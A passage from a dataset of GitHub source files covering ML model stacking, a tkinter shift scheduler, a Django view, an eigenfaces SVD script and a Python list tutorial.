X, y):\n self.base_models_ = [list() for x in self.base_models]\n self.meta_model_ = clone(self.meta_model)\n kfold = KFold(n_splits=self.n_folds, shuffle=True, random_state=156)\n \n # Train cloned base models then create out-of-fold predictions\n # that are needed to train the cloned meta-model\n out_of_fold_predictions = np.zeros((X.shape[0], len(self.base_models)))\n for i, model in enumerate(self.base_models):\n for train_index, holdout_index in kfold.split(X, y):\n instance = clone(model)\n self.base_models_[i].append(instance)\n instance.fit(X[train_index], y[train_index])\n y_pred = instance.predict(X[holdout_index])\n out_of_fold_predictions[holdout_index, i] = y_pred.ravel()\n \n # Now train the cloned meta-model using the out-of-fold predictions as new feature\n self.meta_model_.fit(out_of_fold_predictions, y)\n return self\n \n # Do the predictions of all base models on the test data and use the averaged predictions as\n # meta-features for the final prediction which is done by the meta-model\n def predict(self, X):\n meta_features = np.column_stack([\n np.column_stack([model.predict(X) for model in base_models]).mean(axis=1)\n for base_models in self.base_models_])\n return self.meta_model_.predict(meta_features)\n \n # =============For Esemble and Stacking(end)=============\n \n \n \n def train_evaluate_return_best_model(x_all, y_all, score_func=r2_score, fold_num=5, return_ave=False):\n \"\"\"\n Train predefined models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :param return_ave: return average performance on all methods?\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Training model with K-fords...\")\n kf = KFold(n_splits=fold_num, shuffle=True)\n best_score = 0\n best_idx = 0\n ave_score = 0\n for (model_idx, model) in enumerate(models):\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test+=score_test\n score_mean_train+=score_train\n score_mean_test /= fold_num\n score_mean_train /= fold_num\n ave_score += score_mean_test\n if not return_ave:\n print(\"{} \\t score train: {}, score test: {}\".format(model_heads[model_idx], score_mean_train, score_mean_test))\n if best_score < score_mean_test:\n best_score = score_mean_test\n best_idx = model_idx\n print(\"Training done\")\n print(\"Best model: {}\\t Score: {}\".format(model_heads[best_idx], best_score))\n if return_ave:\n print(\"Average score on {} models = {}\".format(len(models), ave_score/len(models)))\n best_model = models[best_idx]\n best_model.fit(x_all, y_all)\n return best_idx, best_model\n \n def tune_model_params(x_all, y_all):\n \"\"\"\n Tune models on data using 5-fold validation\n :param x_all: ndarray containing all features\n :param y_all: ndarray containing all labels\n :param score_func: score function\n :param fold_num: fold number to use K-fold CV\n :return best_model: best model trained on all data\n \"\"\"\n print()\n print(\"Tuning model...\")\n cv_params = {'reg_alpha': [0.05, 0.1, 1, 2, 3], 'reg_lambda': [0.05, 0.1, 1, 2, 3]}\n other_params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model = xgb.XGBRegressor(**other_params)\n optimized_GBM = GridSearchCV(estimator=model, param_grid=cv_params, scoring='r2', cv=5, verbose=1, n_jobs=1)\n optimized_GBM.fit(x_all, y_all)\n evalute_result = optimized_GBM.grid_scores_\n print('Result:{0}'.format(evalute_result))\n print('Best params:{0}'.format(optimized_GBM.best_params_))\n print('Best score:{0}'.format(optimized_GBM.best_score_))\n \n def get_model(x_all, y_all, model_idx):\n \"\"\"\n Given model index return the corresponding model trained on all data\n :param x_all:\n :param y_all:\n :param model_idx:\n :return model:\n \"\"\"\n print()\n print(\"Training with all data using {}\".format(model_heads[model_idx]))\n model = models[model_idx].fit(x_all, y_all)\n return model\n \n \n '''\n print('Find best models:')\n find_best_model = False # display several preselected models' results (5-folds)\n if find_best_model:\n # show some results\n _, _ = train_evaluate_return_best_model(x_all=train_X, y_all=train_Y,\n score_func=score_function, fold_num=5)\n '''\n # =================================================\n # Ensemble + stacking\n # =================================================\n print()\n print(\"Ensemble start...\")\n '''\n score = get_model_score(lasso, train_X, train_Y)\n print(\"\\nLasso score: {:.4f}\\n\".format(score))\n '''\n score = get_model_score(extra_tree, train_X, train_Y)\n print(\"\\nextra_tree score: {:.4f}\\n\".format(score))\n score = get_model_score(Adaboost, train_X, train_Y)\n print(\"Adaboost score: {:.4f}\\n\".format(score))\n score = get_model_score(RandomForest, train_X, train_Y)\n print(\"Randomforest score: {:.4f}\\n\".format(score))\n score = get_model_score(Gboost, train_X, train_Y)\n print(\"Gradient Boosting score: {:.4f}\\n\".format(score))\n score = get_model_score(model_xgb, train_X, train_Y)\n print(\"Xgboost score: {:.4f}\\n\".format(score))\n score = get_model_score(model_lgb, train_X, train_Y)\n print(\"LGBM score: {:.4f}\\n\".format(score))\n \n \n #stacked_averaged_models = StackingAveragedModels(base_models=(ENet, GBoost, KRR),\n #meta_model=lasso)\n stacked_averaged_models = StackingAveragedModels(base_models=(Adaboost, RandomForest, Gboost),\n meta_model=extra_tree) \n score = get_model_score(stacked_averaged_models, train_X, train_Y)\n print(\"Stacking Averaged models score: {:.4f}\".format(score))\n stacked_averaged_models.fit(train_X, train_Y)\n stacked_train_pred = stacked_averaged_models.predict(train_X)\n stacked_pred = stacked_averaged_models.predict(val_X)\n print('r2 score of stack models on train data:', r2_score(train_Y, stacked_train_pred))\n model_xgb.fit(train_X, train_Y)\n xgb_train_pred = model_xgb.predict(train_X)\n xgb_pred = model_xgb.predict(val_X)\n print('r2 score of xgb on train data:', r2_score(train_Y, xgb_train_pred))\n model_lgb.fit(train_X, train_Y)\n lgb_train_pred = model_lgb.predict(train_X)\n lgb_pred = model_lgb.predict(val_X)\n print('r2 score of lgb on train data:', r2_score(train_Y, lgb_train_pred))\n print('r2 score on train data:')\n print(r2_score(train_Y, stacked_train_pred * 0.70 +\n xgb_train_pred * 0.15 + lgb_train_pred * 0.15))\n model_ensemble = stacked_pred * 0.70 + xgb_pred * 0.15 + lgb_pred * 0.15\n \n self.log_factory.InfoLog(\"The score of ensemble for validation={}\".format(r2_score(val_Y, model_ensemble)))\n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': model_ensemble})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(\n stacked_averaged_models.predict(self.validation_X.cpu().numpy()) * 0.70 \n + model_xgb.predict(self.validation_X.cpu().numpy()) * 0.15 \n + model_lgb.predict(self.validation_X.cpu().numpy()) * 0.15)\n #==============ensemble模型结束======================\n \n \n elif self.model_name == \"nnet\":\n self.train_model.initialization()\n computed_losses = []\n train_losses = []\n for epoch in range(self.train_model.total_epoch):\n stride = self.full_X.shape[0] // self.k_fold\n train_X, train_Y, test_X, test_Y = None, None, None, None\n\n test_loss = 0.0\n train_loss = 0.0\n test_mse = 0.0\n train_mse = 0.0\n test_r2_score = 0.0\n self.train_model.train()\n idx = [i for i in range(self.full_X.shape[0])]\n sampled_idx = random.sample(idx, self.full_Y.shape[0])\n for i in range(self.k_fold):\n indicator = np.array([False for i in range(self.full_X.shape[0])])\n if i != self.k_fold - 1:\n indicator[sampled_idx[i * stride: (i + 1) * stride]] = True\n else:\n indicator[sampled_idx[i * stride:]] = True\n # k-fold CV\n train_X = self.full_X[indicator == False, :]\n train_Y = self.full_Y[indicator == False, :]\n test_X = self.full_X[indicator == True, :]\n test_Y = self.full_Y[indicator == True, :]\n\n self.train_model.optimizer.zero_grad()\n predicted_y = self.train_model(train_X)\n temp_loss = self.train_model.compute_loss(predicted_y, train_Y)\n temp_loss.backward()\n self.train_model.optimizer.step()\n\n with torch.no_grad():\n train_loss += temp_loss.item() / self.k_fold\n predicted_y_test = self.train_model(test_X)\n test_loss += self.train_model.compute_loss(predicted_y_test, test_Y) / self.k_fold\n train_mse += F.mse_loss(predicted_y, train_Y) / self.k_fold\n test_mse += F.mse_loss(predicted_y_test, test_Y) / self.k_fold\n test_r2_score += r2_score(test_Y.cpu().numpy(), predicted_y_test.cpu().numpy()) / self.k_fold\n\n if epoch % 200 == 0:\n self.log_factory.InfoLog(\n \"Epoch={}, while test loss={}, train loss={}, test MSE={}, train MSE={}, r2_score={}\".format(\n epoch, test_loss, train_loss, test_mse, train_mse, test_r2_score))\n computed_losses.append(test_loss.detach().clone().cpu())\n train_losses.append(train_loss)\n with torch.no_grad():\n predicted_y_validate = self.train_model(self.validation_X).squeeze(1).cpu().numpy()\n self.dump_validated_y(predicted_y_validate)\n model_evaluation(computed_losses, train_losses, epoch_step=200)\n\n def kill(self):\n self.log_factory.kill()\n\n def dump_validated_y(self, predicted_y_validate):\n np_full_Y = self.full_Y\n try:\n np_full_Y = self.full_Y.squeeze(1).cpu().numpy()\n predicted_y_validate = predicted_y_validate.cpu().numpy()\n except:\n pass\n\n if self.y_normalizer.initialized:\n predicted_y_validate = self.y_normalizer.decode(predicted_y_validate)\n np_full_Y = self.y_normalizer.decode(np_full_Y)\n\n fig = plt.figure(1)\n plt.scatter([1 for i in range(self.full_Y.shape[0])], np_full_Y, edgecolors='r')\n plt.scatter([2 for i in range(len(predicted_y_validate))], predicted_y_validate, edgecolors='b')\n fig.savefig(os.path.join(self.data_path, \"distribution.png\"))\n\n with open(os.path.join(self.data_path, \"y_validate.csv\"), 'w') as f:\n f.write(\"id,y\\n\")\n for i, pred_y in enumerate(predicted_y_validate):\n f.write(\"{},{}\\n\".format(i, pred_y))\n f.close()\n \n\n \n\n","repo_name":"GeCao/AML","sub_path":"Task1/src/CoreManagement.py","file_name":"CoreManagement.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"28262302358","text":"import argparse\nimport json\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"create sub\")\n\n parser.add_argument(\"exp\")\n args = parser.parse_args()\n\n with open(f\"data/output/{args.exp}.json\", \"r\") as f:\n result = json.load(f)\n\n pred = result[\"output\"][\"pred\"]\n\n sub = pd.read_csv(\"data/submit_sample.csv\", names=[\"id\", \"pred\"])\n sub[\"pred\"] = pred\n\n sub.to_csv(f\"data/subs/{args.exp}.csv\", header=False, index=False)\n","repo_name":"habroptilus/ds-monorepo","sub_path":"projects/sony/create_sub.py","file_name":"create_sub.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72671563564","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter.ttk import *\r\nimport EmployeeData\r\nimport Classes\r\nfrom Edit_Emp import values\r\nimport copy\r\n\r\n\r\n\r\ndef generate(gen_win):\r\n def generate_scheudle(new_emp_list, shifts, weekly_rest):\r\n def checks():\r\n #checking if the employee is not already in current shift, previous shift or next shift\r\n if shifts_sorted[x].shift_num%2 == 0:\r\n shifts_check = []\r\n i = -4\r\n while i < 6:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n else:\r\n shifts_check = []\r\n i = -5\r\n while i < 5:\r\n if shifts_sorted[x].shift_num + i > 41:\r\n pass\r\n else:\r\n shifts_check.append(weekly_rest[shifts_sorted[x].shift_num + i])\r\n i += 1\r\n if new_emp_list[count].employee_number in shifts_check:\r\n return False\r\n\r\n #Checking if the employee has not yet exceeded the limitation of 7 nights per 2 weeks\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5) and new_emp_list[count].last_week_nights + 1 == 8:\r\n return False\r\n if new_emp_list[count].num_of_shifts == 0:\r\n return False\r\n return True\r\n\r\n def sort_by_weeklyshifts(elem):\r\n return elem.weekly_rest_num\r\n\r\n def sort_by_amount(elem):\r\n return elem.num_of_shifts\r\n\r\n\r\n new_emp_list = sorted(new_emp_list, key = sort_by_weeklyshifts)\r\n shifts_sorted = []\r\n for x in range(42):\r\n shifts_sorted.append(Classes.Shift(x,len(shifts[x]),copy.deepcopy(shifts[x])))\r\n shifts_sorted = sorted(shifts_sorted, key = sort_by_amount)\r\n\r\n for x in range(0,42,2):\r\n if weekly_rest[shifts_sorted[x].shift_num] == 0:\r\n found = False\r\n count = 0\r\n while found == False and count < len(new_emp_list):\r\n if new_emp_list[count].employee_number in shifts_sorted[x].list_of_employees:\r\n if checks():\r\n weekly_rest[shifts_sorted[x].shift_num]= new_emp_list[count].employee_number\r\n new_emp_list[count].num_of_shifts -= 1\r\n found = True\r\n if (shifts_sorted[x].shift_num%6 == 4 or shifts_sorted[x].shift_num%6 ==5):\r\n new_emp_list[count].last_week_nights += 1\r\n new_emp_list[count].weekly_rest_num -= 1\r\n while count15 and x<20):\r\n continue\r\n if employee_number not in shifts[x*2+1]:\r\n shifts[x*2+1].append(employee_number)\r\n weekly_counter += 1\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].append(employee_number)\r\n weekly_counter += 1\r\n else:\r\n if employee_number in shifts[x*2+1]:\r\n shifts[x*2+1].remove(employee_number)\r\n if (emp_list[employee_number-1].incharge == True):\r\n shifts[x*2].remove(employee_number)\r\n emp_list[employee_number-1].weekly_rest_num = weekly_counter\r\n combo.configure(state = 'normal')\r\n select_btn.config(state='normal')\r\n emp_rest.destroy()\r\n\r\n\r\n\r\n emp_rest = Toplevel()\r\n emp_rest.geometry('600x300')\r\n emp_rest.title(\"Personal Employee Restrictions\")\r\n employee_number = int(combo.get().split(':')[0])\r\n headline_personal = Label(emp_rest, font = 'Ariel 14 bold underline', justify='center', text=combo.get()[2:])\r\n headline_personal.grid(row=0, pady=5)\r\n\r\n # frame for the days of the week on top\r\n frame_body = Frame(emp_rest, relief='groove')\r\n frame_body.grid(row=1, pady=10, padx=10)\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row = 0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n # frame for the comboboxes\r\n frame_body_left = Frame(frame_body, relief='groove')\r\n frame_body_left.grid(row=1, column=0, sticky='w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row=1, column=1)\r\n\r\n combo_shifts = []\r\n row2 = 0\r\n column2 = 0\r\n for x in range(21):\r\n shift_box = Combobox(frame_body_right, values='\" \" Yes', width = 5)\r\n shift_box.current(0)\r\n combo_shifts.append(shift_box)\r\n combo_shifts[x].grid(row= row2, column=column2, padx=7, pady=8)\r\n if int(combo.get().split(':')[0]) in shifts[x*2+1] or int(combo.get().split(':')[0]) in shifts[x*2]:\r\n combo_shifts[x].current(1)\r\n row2 += 1\r\n if row2%3 == 0:\r\n row2 = 0\r\n column2 +=1\r\n\r\n save_btn = Button(emp_rest, text = 'save', command = save_shifts)\r\n save_btn.grid(row = 2, pady = 8)\r\n emp_rest.protocol(\"WM_DELETE_WINDOW\", close_win)\r\n\r\n\r\n # Checking the restrictions of maximum 3 consecutive Saturdays and up to 7 nights per week\r\n # For the hand picked restrictions\r\n def check_restrictions():\r\n new_emp_list = copy.deepcopy(emp_list)\r\n weekly_rest = []\r\n for x in range(42):\r\n weekly_rest.append(int(restrictions[x].get().split(':')[0]))\r\n if (x%6 == 4 or x%6 == 5) and int(restrictions[x].get().split(':')[0]) != 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights + 1 == 8:\r\n messagebox.showerror('Restrictions Error',\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than\"\r\n \" 7 nights per 2 weeks\")\r\n return\r\n else:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].last_week_nights += 1\r\n elif (x>31 and x<40) and (int(restrictions[x].get().split(':')[0]) != 0):\r\n if new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].saturdays + 1 == 4:\r\n messagebox.showerror('Restrictions Error', new_emp_list[int(\r\n restrictions[x].get().split(':')[0]) - 1].name + \" cannot work more than 3 consecutive Saturdays\")\r\n return\r\n if int(restrictions[x].get().split(':')[0]) > 0:\r\n if new_emp_list[int(restrictions[x].get().split(':')[0])-1].num_of_shifts > 0:\r\n new_emp_list[int(restrictions[x].get().split(':')[0]) - 1].num_of_shifts -= 1\r\n else:\r\n pass\r\n for x in range(4):\r\n if int(last_week[x].get().split(':')[0]) == 0:\r\n messagebox.showerror('Restrictions Error', \" Last Saturday shifts fields must be filled\")\r\n return\r\n weekly_rest.append(int(last_week[x].get().split(':')[0]))\r\n generate_scheudle(new_emp_list, shifts, weekly_rest)\r\n\r\n\r\n\r\n\r\n #main part of generating the schedule\r\n emp_list = EmployeeData.importList()\r\n\r\n\r\n\r\n headline = Label(gen_win, text=\"Generate New Schedule\", font=\"Ariel 14 bold underline\", justify = 'center')\r\n headline.grid(row=0, pady=10)\r\n select_emp = Label(gen_win, text = \"Restrictions\", font = \"Ariel 12 bold underline\")\r\n select_emp.grid(row = 1, column = 0, padx = 10, pady = 10)\r\n\r\n\r\n #main frame for hand picking shifts\r\n frame_body = Frame(gen_win, relief = 'groove', width = 500, height = 500)\r\n frame_body.grid(row =2, padx = 10, pady = 10)\r\n\r\n #frame for the days of the week on top\r\n frame_body_head = Frame(frame_body, relief = 'groove')\r\n frame_body_head.grid(row =0, column = 1)\r\n lbl_sun = Label(frame_body_head, text=\"Sunday\").grid(row=0, column=1, padx=10, pady=10)\r\n lbl_mon = Label(frame_body_head, text=\"Monday\").grid(row=0, column=2, padx=10, pady=10)\r\n lbl_teu = Label(frame_body_head, text=\"Tuesday\").grid(row=0, column=3, padx=10, pady=10)\r\n lbl_wed = Label(frame_body_head, text=\"Wednesday\").grid(row=0, column=4, padx=10, pady=10)\r\n lbl_thu = Label(frame_body_head, text=\"Thursday\").grid(row=0, column=5, padx=10, pady=10)\r\n lbl_fri = Label(frame_body_head, text=\"Friday\").grid(row=0, column=6, padx=10, pady=10)\r\n lbl_sat = Label(frame_body_head, text=\"Saturday\").grid(row=0, column=7, padx=10, pady=10)\r\n\r\n #frame for days and positions\r\n frame_body_left = Frame(frame_body, relief = 'groove')\r\n frame_body_left.grid(row = 2, column = 0, sticky = 'w')\r\n lbl_mor = Label(frame_body_left, text=\"Morning:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_after = Label(frame_body_left, text=\"Afternoon:\").grid(row=2, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_body_left, text=\"Night:\").grid(row=4, column=0, padx=10, pady=10)\r\n for x in range(0,5,2):\r\n lbl_incharge = Label(frame_body_left, text = \"Incharge\")\r\n lbl_patrol = Label(frame_body_left, text = \"Patrol\")\r\n lbl_incharge.grid(row = x, column = 1, padx = 2, pady = 2)\r\n lbl_patrol.grid(row = x+1, column = 1, padx =2, pady =2)\r\n\r\n\r\n #Creates and places a weekly restrictions table for the supervisor to hand pick\r\n frame_body_main = Frame(frame_body, relief = 'groove')\r\n frame_body_main.grid(row = 2, column = 1)\r\n restrictions = []\r\n row1 = 0\r\n column1 = 0\r\n for x in range(0, 42,2):\r\n combo_shift = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift.configure(value=values(emp_list))\r\n restrictions.append(combo_shift)\r\n restrictions[x].grid(row= row1, column=column1, padx=2, pady=5)\r\n combo_shift2 = Combobox(frame_body_main, state='readonly', width=7)\r\n combo_shift2.configure(value=values(emp_list))\r\n restrictions.append(combo_shift2)\r\n restrictions[x+1].grid(row=row1+1, column=column1, padx=2, pady=5)\r\n restrictions[x].current(0)\r\n restrictions[x+1].current(0)\r\n row1 += 2\r\n if row1%6 == 0:\r\n row1 = 0\r\n column1 +=1\r\n\r\n frame_body_right = Frame(frame_body)\r\n frame_body_right.grid(row = 2, column = 2, padx = 5)\r\n headline2 = Label(frame_body_right, font='Ariel 12 bold underline', text=\"Saturday shifts:\")\r\n headline2.grid(row=0, pady = 12, padx = 5)\r\n\r\n frame_left = Frame(frame_body_right)\r\n frame_left.grid(row=1, column=0)\r\n frame_right = Frame(frame_body_right, height = 300, width = 200)\r\n frame_right.grid(row=1, column=1)\r\n\r\n # frame for days and positions\r\n lbl_after = Label(frame_left, text=\"Afternoon:\").grid(row=0, column=0, padx=10, pady=10)\r\n lbl_eve = Label(frame_left, text=\"Night:\").grid(row=2, column=0, padx=10, pady=10)\r\n for x in range(0, 3, 2):\r\n lbl_incharge = Label(frame_left, text=\"Incharge\")\r\n lbl_patrol = Label(frame_left, text=\"Patrol\")\r\n lbl_incharge.grid(row=x, column=1, padx=2, pady=2)\r\n lbl_patrol.grid(row=x + 1, column=1, padx=2, pady=2)\r\n last_week = []\r\n for x in range(4):\r\n combo_last_week = Combobox(frame_right, width=8, value = values(emp_list))\r\n combo_last_week.grid(row=x, padx = 10, pady = 4)\r\n combo_last_week.current(0)\r\n last_week.append(combo_last_week)\r\n\r\n\r\n #This bit is for the personal restrictions that the employees themselves have sent\r\n #creating a shifts variable, a list of lists that in it there would be the the employees willing work each shift\r\n shifts = []\r\n for x in range(42):\r\n shifts.append([])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n frame_btm = Frame(gen_win, width = 500, height = 500)\r\n frame_btm.grid(row =3, pady=30)\r\n\r\n combo = Combobox(frame_btm, state='readonly')\r\n combo.configure(value=values(emp_list))\r\n choose_emp = Label(frame_btm, text=\"Choose employee: \")\r\n choose_emp.grid(row=0, padx=20, column=0, sticky = 'w')\r\n combo.grid(row=0, column=1, padx=20)\r\n combo.current(0)\r\n select_btn = Button(frame_btm, text=\"Select\", command = personal_rest)\r\n select_btn.grid(row=0, column=2, padx=20, sticky = 'e')\r\n\r\n next_btn = Button(gen_win, text = \"Generate Schedule\", command = check_restrictions)\r\n next_btn.grid(row =4, column = 0, sticky = 'e', padx = 20)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MaEyal/Work-Schedule","sub_path":"Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":19919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19401052476","text":"import random\n\n# Mendeklarasikan variabel n sebagai input dengan tipe data integer\nn = int(input(\"Masukan nilai N: \"))\n# Perulangan untuk mencetak berapa baris yang dibuat berdasarkan variabel n\nfor i in range(n):\n # Mencetak perulangan, ditambah 1 setiap perulangan terjadi, untuk menjadikan baris pertama = 1,\n # dan mencetak angka acak dengan tipe data float.\n print(\"data ke\",i+1,\":\" , random.uniform(0, 0.5))\nprint(\"Selesai\")\n","repo_name":"antonmartinus72/labpy03","sub_path":"py/latihan1.py","file_name":"latihan1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19774394793","text":"from django.db.models.functions import Lower\n\nfrom base.apps.github.models import User, Follower\n\nfrom views.base import ListView\nfrom ..mixins import UserMixin\n\nclass ListView(UserMixin,ListView):\n context_object_name = \"user_list\"\n template_name = \"user/following/user_list.html\"\n\n def get_queryset(self,**kwargs):\n qs = User.objects.filter(\n id__in=Follower.objects.filter(follower_id=self.github_user.id).values_list('user_id',flat=True)\n )\n q = self.request.GET.get('q','').strip()\n if q:\n qs = qs.filter(\n Q(**{'login__icontains':q}) |\n Q(**{'name__icontains':q}) |\n Q(**{'company__icontains':q}) |\n Q(**{'location__icontains':q})\n )\n return qs.order_by(Lower('login'))\n","repo_name":"andrewp-as-is/gist-list-django-server","sub_path":"views/user/following/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"40967376966","text":"from image import color2gray, file2image, image2display\nfrom svd import factor\nimport os\nfrom math import sqrt\n\nimport sys\nsys.path.append('../vectors')\nsys.path.append('../matrix')\nfrom vec import Vec\nfrom mat import Mat\nfrom vecutil import list2vec\nfrom matutil import rowdict2mat, mat2coldict, coldict2mat\n\ndef load_images(path, n = 20):\n '''\n Input:\n - path: path to directory containing img*.png\n - n: number of images to load\n Output:\n - dict mapping numbers 0 to (n-1) to a list of rows,\n each of which is a list of pixel brightnesses\n '''\n return {i:color2gray(file2image(os.path.join(path,\"img%02d.png\" % i))) for i in range(n)}\n\ndef vec2image(vec, rowsCnt, colsCnt):\n indexes = sorted(list(vec.D))\n result = []\n for i in range(rowsCnt):\n result.append([])\n for j in range(colsCnt):\n result[-1].append(vec[i * colsCnt + j])\n\n return result\n\ndef find_centroid(images):\n return sum(images.values()) / len(images)\n\ndef center_images(images, centroid):\n return { key: (val - centroid) for key, val in images.items() }\n\ndef projected_representation(M, x):\n return M * x\n\ndef projection_length_squared(M, x):\n repr = projected_representation(M, x)\n return repr * repr\n\ndef distance_squared(M, x):\n repr = projected_representation(M, x)\n return x * x - repr * repr\n\ndef project(M, x):\n coordinates = projected_representation(M, x)\n return coordinates * M\n\nraw_images = load_images('./faces')\nrowsCnt = len(raw_images[0])\ncolsCnt = len(raw_images[0][0])\n\nimages = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images.items() }\ncentroid = find_centroid(images)\ncentered_images = center_images(images, centroid)\nM = rowdict2mat(centered_images)\n\nprint('Factoring...')\nU, E, V = factor(M)\nprint('Done')\nprint(len(U.D[0]), len(U.D[1]))\nprint(len(E.D[0]), len(E.D[1]))\nprint(len(V.D[0]), len(V.D[1]))\nprint(E[0,0], E[1,1], E[2,2], E[3,3])\n\north_basis = rowdict2mat({ key: vec for key, vec in mat2coldict(V).items() if key < 10 })\nprint(len(orth_basis.D[0]), len(orth_basis.D[1]))\nprint(len(centered_images[0].D))\n\nprint({ key: distance_squared(orth_basis, image) for key, image in centered_images.items() })\n\nprint('UNCLASIFIED')\nraw_images_uncl = load_images('./unclassified', 10)\nimages_uncl = { key: list2vec([ el for row in image for el in row ]) for key, image in raw_images_uncl.items() }\ncentered_images_uncl = center_images(images_uncl, centroid)\n\ndist = { key: distance_squared(orth_basis, image) for key, image in centered_images_uncl.items() }\nmax = max(dist.values())\ndist = { key: val * 100 / max for key, val in dist.items() }\n\nprint(dist)\n\nprint(\"Eigen Faces\")\n\nfor i in range(10):\n projection = project(orth_basis, centered_images_uncl[i]) + centroid\n image2display(vec2image(projection, rowsCnt, colsCnt))\n","repo_name":"AleksandrRogachev94/CodingTheMatrix","sub_path":"svd/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39059507923","text":"import sys\nsys.stdin = open('input_russia.txt', 'r')\nN = int(input())\n\nfor tc in range(1, N+1):\n r, c = map(int, input().split())\n flag = []\n for _ in range(r):\n flag.append(list(map(str, input())))\n print(flag)\n","repo_name":"91hongppie/algorithm","sub_path":"190919/russia.py","file_name":"russia.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"25196444878","text":"# 使用list函数\nll = list('hello list')\nprint(ll)\n\n# 列表元素赋值 如 x[3]=5\nx = [1,2,3,4,5]\n# 改变列表第四个元素的值\nx[3] = 5\nprint(x)\n\n# 删除元素 del\nnames = ['zhangsan','lisi','wangwu','zhaoliu']\nprint(names)\n# 删除第三个元素\ndel names[2]\n# 最后列表长度变为3\nprint(names)\n\n\n# 分片赋值\nname = list('python')\nname[2:] = 'wr'\nprint(name)\n\n# 序列不等长分片替换\nname_re = list('perl')\n# 替换第一个元素后的所有内容\nname_re[1:] = list('ython')\nprint(name_re)\n\n# 插入新元素\nnum = [1,4,5]\n# 在第一个元素后插入新的元素\nnum[1:1] = [2,3]\nnum\nprint(num)\n\n# 给第一个和迪桑元素之间分片赋值一个空序列,即删除元素\nnum[1:3] = []\nnum\n[1, 4, 5]\n\n# 负数分片操作\nnum[-1:-1] = [5,5,5]\nprint(num)\n\n\n# 列表方法 追加内容\nlist_append = [1,2,3,4]\nlist_append.append(5)\nprint(list_append)\n\n# 统计列表中某个内容的词频\nnum.count(5)\n\n\n# 统计字母a出现的次数\nname = ['a','a','abf','ark','nhk']\n\nname.count('a')\n\n\n# extend 方法\na =[1,2,3]\nb = [4,5,6]\n# 将列表b追加在列表a后面\na.extend(b)\nprint(a)\n\n\n# index 方法\ncontent = ['where','who','lisi','cntent','who']\ncontent.index('who')\n\n# insert 方法\nnum = 